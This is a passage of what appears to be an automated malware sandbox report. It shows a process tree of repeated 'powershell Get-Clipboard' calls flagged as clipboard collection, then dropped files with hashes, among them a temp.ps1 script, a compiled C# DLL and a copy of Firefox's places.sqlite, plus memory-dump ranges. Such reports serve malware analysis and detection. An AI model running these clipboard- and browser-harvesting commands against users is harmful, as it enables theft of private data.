                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1792
                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:3876
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Clipboard Data
                                                                                                                                                                                                                                                                          PID:3756
                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell Get-Clipboard
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3460
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4672
                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1876
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:116
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Clipboard Data
                                                                                                                                                                                                                                                                                    PID:4456
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:3880
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell Get-Clipboard
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4728
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:1704
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          powershell Get-Clipboard
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3400
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:3988
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              powershell Get-Clipboard
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:2864
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Clipboard Data
                                                                                                                                                                                                                                                                                              PID:2908
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                powershell Get-Clipboard
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:3132
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:3512
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    powershell Get-Clipboard
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4120

                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        3f01549ee3e4c18244797530b588dad9

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        e86a2f4d6dec82df96431112380a87e6

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        2dc61fae82770528bee4fe5733a8ac3396012e79

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        4be581f297c9b0c1eebedbff7baabce6

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        9a3e4644e96ec6bc5050ed3349723302b54904c4

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        c7026c0a08b49aeb46d78d5c2d3b0c4307572e244583986c1576c8fbef29102e

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        7a36c097497773414977271a6c3630bd59d193e5b8adbfe1c009eff04f016dfc5edc6558662af052ea717590b093a7e7798dde910cc6f6ef870b19e1d4d9b77e

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        64B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        ca9a4e245f2b176b89921c7aca894f96

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        639aaa343c7fc5e3d0083f9072dce71b364858c3

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        346519ddfca9c0efa85ec3bc896ff4e9738363d7b94061e91c01a8da8ee9a721

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        a0e27868e8b0c21c122797cc3a2cbb6029e956d6e511650ff1c4e1ffcb307995b8f16a07b88f31ab4d346e240a338af67225bd819ffe5e78fda5866355d9907f

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        64B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        446dd1cf97eaba21cf14d03aebc79f27

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Duck-ebT7.zip

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        30351e55e608a3916439787ba86cac7e

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        8785e8f2e72ed0e75c8907557a6849707ea93712

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        00a89a980ad1e46efab10a3df6d8c2f9f58fe484ba352ae372a553112dd58166

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        50658ba8c4f11728bd440e4b4f54a6a0256463ea6d281b39e3361a37b7f928188d2659c1593458c1c2bf783fd80248c400820a6ec0b19138863ac4b76d017a46

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RESB323.tmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        faddd45026f1e4b8ecc32f4c28af8998

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        0a5fe0b845996dba9e7efb9f0142e3c43324c796

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        615c7048a78fd097ee18c2c03cd57a83f0f18dfc39a8e94a61a8c5f17176006d

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        e7fff062e113d68f998f9313f539ba0b07b85e61738436dc547fcc7093d1733f38fe9d03d0bf1d78c0a01dfb74a3be7ddaf3cfb3fd1fcfc115183d27106cca90

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gecwkxv2.g11.ps1

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\leryz0fn\leryz0fn.dll

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        26f6bf42b0512d4a6982d8db7ece634a

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        ab581e095b768ef523eec9d146df887b7fb694af

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        a5c78d72eb608b1062f9a9e61e651f92b796015fd1df0081887f20d6a8650514

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        b929506990c2f21e688cf4007f79c98fc89368fdfeffbf52f4cd5a85f64875c49791382f00dc0666f75d55c001ae6083077a33326990bfbdf950bed0246c4a3c

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pkg-kJUllP\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        137KB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        108440900bc61220e09bb1d0a4102b9a

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        841697d9325d35df5fec9e607eebd40f16690e3c

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        cc9a7c732c8fe4864c72ab650abfebc8264ecb7b38ed2a6875e7dbe2da4fd0a80ce894767af07b2b16f24575ee3435a261f899e4c1b63e01e4e3d94253e244b0

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\pkg-kJUllP\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        66a65322c9d362a23cf3d3f7735d5430

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        ed59f3e4b0b16b759b866ef7293d26a1512b952e

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\places.sqlite_tmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        ae71e46d9a9c60a6fb840b70cad13b91

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        2a213ae784f5242cc21d9b934706be25ce760f62

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        357e7a24b49900c79fc7cb36548dd6f0607a80dd7e852bf28ebd9a9e46335906

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        625dca8ad62b6cc1572d3be14df6926d18129b66198be13e215dac77f2250ca5f0400cb74961cfd45a68ddda8766364ce7454d74b8315298d6f69ef0bf83bde5

                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\temp.ps1

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        379B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        18047e197c6820559730d01035b2955a

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        277179be54bba04c0863aebd496f53b129d47464

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

                                                                                                                                                                                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\leryz0fn\CSCA9C2870764324F7B88990C03CFF159.TMP

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        652B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        ad75e9a4b7c5df7f237293bdb2714f39

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        b731795b14b76bd82dc7d63b30b6afcff547c311

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        ecfc0c7e1c6099786efd942336b1ec2a722dd8f0402eabd046c763dcc88c546a

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        ed19daa61acc15461d1ea08ff09699e08fed57ce007c81a0e713fcdbaa56594db0990f96109aa0d7989ad328864e9c972986cc64ee8d10386d50e22d9c75ac79

                                                                                                                                                                                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\leryz0fn\leryz0fn.0.cs

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        311B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        7bc8de6ac8041186ed68c07205656943

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

                                                                                                                                                                                                                                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\leryz0fn\leryz0fn.cmdline

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        369B

                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                        e56ca81134243d458e4b895605a60720

                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                        6d795c2004f14acdf5d761c2761e54aedc978004

                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                        fb6bb92aa7d506cca4de036173dc9a65cb2b3834abbf3bdafe0e7f380d33db3d

                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                        86c373050a37966e456809d25ada641b809ebc30735aaf5174fbd954e21f92b91379782a5e499658e2071514eb5fc777c3692abf659bcc1b787ffcee3546b78d

                                                                                                                                                                                                                                                                                                      • memory/1436-163-0x000001F76DD50000-0x000001F76DDA0000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        320KB

                                                                                                                                                                                                                                                                                                      • memory/4036-151-0x00007FFFF7C20000-0x00007FFFF86E1000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                                                                                                      • memory/4036-147-0x00000287F0AA0000-0x00000287F0AA8000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                      • memory/4036-134-0x00000287F0FF0000-0x00000287F1066000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        472KB

                                                                                                                                                                                                                                                                                                      • memory/4036-133-0x00000287F0F20000-0x00000287F0F64000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        272KB

                                                                                                                                                                                                                                                                                                      • memory/4036-132-0x00007FFFF7C20000-0x00007FFFF86E1000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                                                                                                      • memory/4036-131-0x00007FFFF7C20000-0x00007FFFF86E1000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                                                                                                      • memory/4036-121-0x00000287F0A10000-0x00000287F0A32000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                                                                                                      • memory/4036-120-0x00007FFFF7C23000-0x00007FFFF7C25000-memory.dmp

                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                        8KB